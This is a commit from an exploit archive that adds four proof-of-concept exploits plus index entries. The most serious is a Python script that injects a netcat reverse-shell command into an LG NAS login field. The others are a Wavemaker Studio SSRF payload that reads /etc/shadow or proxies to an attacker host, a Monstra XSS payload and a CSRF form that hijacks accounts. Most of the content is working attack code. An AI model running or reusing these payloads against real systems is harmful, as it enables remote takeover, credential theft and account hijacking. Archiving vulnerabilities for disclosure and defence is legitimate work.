DB: 2018-08-13
4 changes to exploits/shellcodes LG NAS 3718.510.a0 - Remote Command Execution Monstra 3.0.4 - Cross-Site Scripting Wavemaker Studio 6.6 - Server-Side Request Forgery Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
This commit is contained in:
Offensive Security
parent
9773c89242
commit
e5c23cdd53
5 changed files with 149 additions and 0 deletions
52
exploits/hardware/webapps/45109.py
Executable file
52
exploits/hardware/webapps/45109.py
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
# LG NAS 3718.510.a0 - Remote Command Execution
|
||||
# Author: @0x616163
|
||||
# Date: 2018-07-29
|
||||
# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
|
||||
# CVE: N/A
|
||||
# Firmware Version: 3718.510.a0
|
||||
|
||||
#!/usr/bin/env python
|
||||
|
||||
import sys
|
||||
import argparse
|
||||
import requests
|
||||
from collections import OrderedDict
|
||||
|
||||
def checkUser(target):
|
||||
# Exploiting this vulnerability requires a valid user account
|
||||
# on the target NAS otherwise the vulnerable code is not executed
|
||||
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
|
||||
r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
|
||||
if r.text == "NG:WRONG PASSWORD\n":
|
||||
print "[*] Valid user found: admin"
|
||||
return 0
|
||||
elif r.text == "NG:NO USER\n":
|
||||
print "[*] User not found: admin"
|
||||
sys.exit(1)
|
||||
|
||||
def sendPayload(target,lhost,lport):
|
||||
print "[*] Sending payload.."
|
||||
try:
|
||||
parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
|
||||
r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
|
||||
except requests.exceptions.ReadTimeout:
|
||||
print "[*] Payload sent. Exiting."
|
||||
sys.exit(0)
|
||||
|
||||
return 0
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
|
||||
parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
|
||||
parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
|
||||
parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
|
||||
results = parser.parse_args()
|
||||
args = vars(results)
|
||||
if len(sys.argv) < 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
else:
|
||||
if checkUser(args['target']) == 0:
|
||||
sendPayload(args['target'], args['lhost'],args['lport'])
|
||||
|
||||
main()
|
||||
sys.exit(0)
|
||||
35
exploits/java/webapps/45158.txt
Normal file
35
exploits/java/webapps/45158.txt
Normal file
|
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
|
||||
# Exploit Author: Gionathan "John" Reale
|
||||
# Google Dork: N/A
|
||||
# Date: 2018-08-01
|
||||
# Vendor Homepage: http://www.wavemaker.com/
|
||||
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
|
||||
# Affected Version: 6.6
|
||||
# Tested on: Parrot OS
|
||||
# CVE : N/A
|
||||
|
||||
# Description
|
||||
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
|
||||
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
|
||||
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
|
||||
# as a form of HTTP proxy among other things.
|
||||
|
||||
# Proof Of Concept
|
||||
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
|
||||
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
|
||||
|
||||
# Vulnerable Code
|
||||
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
|
||||
|
||||
# Line 419-430
|
||||
@ExposeToClient
|
||||
public String getContent(String inUrl) throws IOException {
|
||||
try {
|
||||
String str = getRemoteContent(inUrl);
|
||||
str = str.replace("<head>", "<head><base href='" + inUrl
|
||||
+ "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
|
||||
return str;
|
||||
} catch (Exception e) {
|
||||
return "";
|
||||
}
|
||||
}
|
||||
17
exploits/php/webapps/45156.txt
Normal file
17
exploits/php/webapps/45156.txt
Normal file
|
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
|
||||
# Date: 2018-08-04
|
||||
# Exploit Author: Nainsi Gupta
|
||||
# Vendor Homepage: http://monstra.org/
|
||||
# Software Link: https://github.com/monstra-cms/monstra
|
||||
# Product Name: Monstra-dev
|
||||
# Version: 3.0.4
|
||||
# Tested on: Windows 10 (Firefox/Chrome)
|
||||
# CVE : N/A
|
||||
|
||||
# POC
|
||||
1- Go to the site ( http://server.com/monstra-dev/ ) .
|
||||
2- Click on Registration page (Registration) .
|
||||
3- Register by giving you name ,mail and soo on...
|
||||
4- Now log In i the website.
|
||||
5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste "><svg/onload=alert(/Case/)> and in Lastname paste "><svg/onload=alert(/Test/)>
|
||||
6- After saving the above changes, click on edit profile page and you will be able to see to Pop up stating "Test" and "Case".
|
||||
41
exploits/php/webapps/45164.txt
Normal file
41
exploits/php/webapps/45164.txt
Normal file
|
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)
|
||||
# Date: 2018-08-04
|
||||
# Exploit Author: Nainsi Gupta
|
||||
# Vendor Homepage: http://monstra.org/
|
||||
# Product Name: Monstra-dev
|
||||
# Version: 3.0.4
|
||||
# Tested on: Windows 10 (Firefox/Chrome)
|
||||
# CVE : N/A
|
||||
|
||||
# 1. Description
|
||||
# CSRF vulnerability in admin/user/edit in Monstra-dev 3.0.4 allows an attacker
|
||||
# to take over a user account by modifying user's data such as email and password
|
||||
|
||||
# 2. Exploit and Proof of Concept
|
||||
# To exploit this vulnerability, victim need to be logged in at target site namely
|
||||
# victim.com and visit crafted site made by attacker namely attacker.com.
|
||||
# Then an authenticated POST request will be generated from victim browser and it will
|
||||
# be submit to victim.com to modify user's data to attacker desired value.
|
||||
|
||||
#POC:CSRF
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://localhost/monstra-dev/users/2/edit" method="POST">
|
||||
<input type="hidden" name="csrf" value="7e172c2a395495f3e4c05912cb9f3f7f0ed8344e" />
|
||||
<input type="hidden" name="user_id" value="2" />
|
||||
<input type="hidden" name="login" value="guptanainisi95" />
|
||||
<input type="hidden" name="firstname" value="sd" />
|
||||
<input type="hidden" name="lastname" value="jkh" />
|
||||
<input type="hidden" name="email" value="guptanainsi97@gmail.com" />
|
||||
<input type="hidden" name="twitter" value="" />
|
||||
<input type="hidden" name="skype" value="" />
|
||||
<input type="hidden" name="about_me" value="ss" />
|
||||
<input type="hidden" name="new_password" value="qaz" />
|
||||
<input type="hidden" name="edit_profile" value="Save" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
|
@ -39756,6 +39756,7 @@ id,file,description,date,author,type,platform,port
|
|||
45103,exploits/linux/webapps/45103.txt,"Responsive Filemanager 9.13.1 - Server-Side Request Forgery",2018-07-30,"GUIA BRAHIM FOUAD",webapps,linux,
|
||||
45105,exploits/linux/webapps/45105.py,"H2 Database 1.4.197 - Information Disclosure",2018-07-30,owodelta,webapps,linux,
|
||||
45108,exploits/linux/webapps/45108.txt,"Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection",2018-07-31,0xB455,webapps,linux,
|
||||
45109,exploits/hardware/webapps/45109.py,"LG NAS 3718.510.a0 - Remote Command Execution",2018-07-31,0x616163,webapps,hardware,
|
||||
45127,exploits/php/webapps/45127.html,"WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)",2018-08-02,"Porhai Eung",webapps,php,80
|
||||
45128,exploits/php/webapps/45128.txt,"TI Online Examination System v2 - Arbitrary File Download",2018-08-02,AkkuS,webapps,php,80
|
||||
45129,exploits/php/webapps/45129.txt,"PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection",2018-08-02,AkkuS,webapps,php,80
|
||||
|
|
@ -39775,6 +39776,9 @@ id,file,description,date,author,type,platform,port
|
|||
45152,exploits/aspx/webapps/45152.txt,"Sitecore.Net 8.1 - Directory Traversal",2018-08-06,Chris,webapps,aspx,
|
||||
45153,exploits/java/webapps/45153.txt,"LAMS < 3.1 - Cross-Site Scripting",2018-08-06,"Nikola Kojic",webapps,java,8080
|
||||
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
|
||||
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
|
||||
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
|
||||
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery(Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
|
||||
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue